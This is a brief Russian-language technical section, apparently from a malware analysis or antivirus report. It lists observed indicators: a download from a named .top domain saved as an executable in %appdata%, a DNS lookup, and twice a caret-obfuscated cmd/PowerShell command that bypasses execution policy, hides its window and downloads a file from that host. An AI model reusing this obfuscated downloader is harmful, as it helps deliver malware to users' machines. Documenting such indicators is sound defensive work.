Техническая информация
- http://folueopa.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Ow^e^rShe^lL^.Ex^E^ ^-^ex^ecutIo^n^P^Ol^iCy b^YPA^S^S -nO^P^ro^F^iLe -w^inDo^WST^y^L^e HiDdeN^ ^(NE^w-^obJE^c^t^ sYs^TE^M.^N^et.^WEBc^Li^Ent).D^oWNLoa^df^ilE^(^'http://fo...
- DNS ASK fo###opa.top
- '<SYSTEM32>\cmd.exe' /c "P^Ow^e^rShe^lL^.Ex^E^ ^-^ex^ecutIo^n^P^Ol^iCy b^YPA^S^S -nO^P^ro^F^iLe -w^inDo^WST^y^L^e HiDdeN^ ^(NE^w-^obJE^c^t^ sYs^TE^M.^N^et.^WEBc^Li^Ent).D^oWNLoa^df^ilE^(^'http://fo...' (со скрытым окном)